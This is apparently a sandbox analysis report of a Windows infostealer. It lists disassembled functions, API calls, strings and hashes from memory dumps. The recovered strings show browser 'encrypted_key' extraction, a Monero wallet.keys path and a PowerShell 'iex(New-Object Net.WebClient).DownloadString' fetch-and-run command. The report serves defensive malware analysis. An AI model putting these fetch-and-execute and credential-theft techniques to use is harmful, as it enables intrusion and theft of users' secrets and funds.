Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: a97fb1772f3fd2c8db8e6beefb41c91f7d80e4b102373f32a84e8451db493a51
Instruction ID: 633f1498c73d5ab96061305300e7904a94ee72499ff4943bde0a8a5c7617dc75
Opcode Fuzzy Hash: a97fb1772f3fd2c8db8e6beefb41c91f7d80e4b102373f32a84e8451db493a51
Instruction Fuzzy Hash: 9AC195B590011DABCF18EFA4DCD9FDA7778FB64304F004599E10AAB251DB70AA85CF92

Function 008B4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B42EC
lstrcat.KERNEL32(?,0127E218), ref: 008B430B
lstrcat.KERNEL32(?,?), ref: 008B431F
lstrcat.KERNEL32(?,0127D538), ref: 008B4333

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F

Part of subcall function 008A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39

Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

Part of subcall function 008B93C0: GlobalAlloc.KERNEL32(00000000,008B43DD,008B43DD), ref: 008B93D3

StrStrA.SHLWAPI(?,0127E3C8), ref: 008B43F3
GlobalFree.KERNEL32(?), ref: 008B4512

Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F

lstrcat.KERNEL32(?,00000000), ref: 008B44A3
StrCmpCA.SHLWAPI(?,008C08D1), ref: 008B44C0
lstrcat.KERNEL32(00000000,00000000), ref: 008B44D2
lstrcat.KERNEL32(00000000,?), ref: 008B44E5
lstrcat.KERNEL32(00000000,008C0FB8), ref: 008B44F4

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 4277270dbd790c66918c3d976c23d791e82b441aa22058938bacb95c0caa2d29
Instruction ID: fe716d378ae40a1d8357a1a93b5f819650527153664b4849e8987689f091219e
Opcode Fuzzy Hash: 4277270dbd790c66918c3d976c23d791e82b441aa22058938bacb95c0caa2d29
Instruction Fuzzy Hash: CA7135B6900218ABDB14EBE4DC85FEE7779FB58300F044598F605D7281EA74EB45CB92

Function 008B6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 008B6774
ExitProcess.KERNEL32 ref: 008B67A5
ExitProcess.KERNEL32 ref: 008B67AF
ExitProcess.KERNEL32 ref: 008B67B9
ExitProcess.KERNEL32 ref: 008B67C3
ExitProcess.KERNEL32 ref: 008B67CD

Strings

*, xrefs: 008B678C

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
Instruction ID: 405a1ea71c04560ecf7f4b9653e8cc2a8ef9d7cc58df7186c07f44dae6195b93
Opcode Fuzzy Hash: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
Instruction Fuzzy Hash: F6F08275904289EFD344DFE0E94976C7B70FB14703F040298F609CA390EA746B52DB96

Function 008B2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

ShellExecuteEx.SHELL32(0000003C), ref: 008B2D85

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008B2CC4
')", xrefs: 008B2CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008B2D04
<, xrefs: 008B2D39

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
Instruction ID: a431b16a2c594c0149f114dfe0b429c23ca093454eda68c0d2088a44e536e6c6
Opcode Fuzzy Hash: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
Instruction Fuzzy Hash: DF41AD71810208AADB18EBA4C8A1FDDBB74FF14700F404129E116EA291DF746A4ACF92

Function 008A9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 008A9F41

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Strings

v10, xrefs: 008A9EA3
v20, xrefs: 008A9E21
@, xrefs: 008A9EF1
ERROR_RUN_EXTRACTOR, xrefs: 008A9E67

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 056fd22f3b226952c439220c5f0ae87ea5efe4c47d56c19c1dbe6cfa27645c7f
Instruction ID: ee9ac860f9a1fa5c7b1d27370356fb275a52be34f2880b9a52fafcecb86a6e27
Opcode Fuzzy Hash: 056fd22f3b226952c439220c5f0ae87ea5efe4c47d56c19c1dbe6cfa27645c7f
Instruction Fuzzy Hash: 40610D75A10248EBDB28EFA8CC95FED77B5FF45304F008418E90A9BA91DB746A05CB52

Function 008B6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 008B696C
sscanf.NTDLL ref: 008B6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69C0
ExitProcess.KERNEL32 ref: 008B69DA

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
Instruction ID: 1045c63916a2c3788a0266b8e24a79e6f29c63d12dca789db7912d0ba7f8c072
Opcode Fuzzy Hash: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
Instruction Fuzzy Hash: CD21CB75D14208ABCF08EFE8D9859EEB7B5FF58300F04852AE416E7250EB346619CBA5

Function 008B9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0127DE28,?,?,?,008B140C,?,0127DE28,00000000), ref: 008B926C
lstrcpyn.KERNEL32(00AEAB88,0127DE28,0127DE28,?,008B140C,?,0127DE28), ref: 008B9290
lstrlen.KERNEL32(?,?,008B140C,?,0127DE28), ref: 008B92A7
wsprintfA.USER32 ref: 008B92C7

Strings

%s%s, xrefs: 008B92B5

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
Instruction ID: 84bbdca69a83204501755fd246c99cc800db51d4cdf3b4e33c180ecde47ce1bd
Opcode Fuzzy Hash: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
Instruction Fuzzy Hash: CE01A575500148FFCB04DFECC998EAE7BB9FB58354F108548F9099B205C671AE41DB92

Function 008BC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 008BC8EC
___crtLCMapStringA.LIBCMT ref: 008BC90C
___crtLCMapStringA.LIBCMT ref: 008BC931

Strings

, xrefs: 008BC896

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
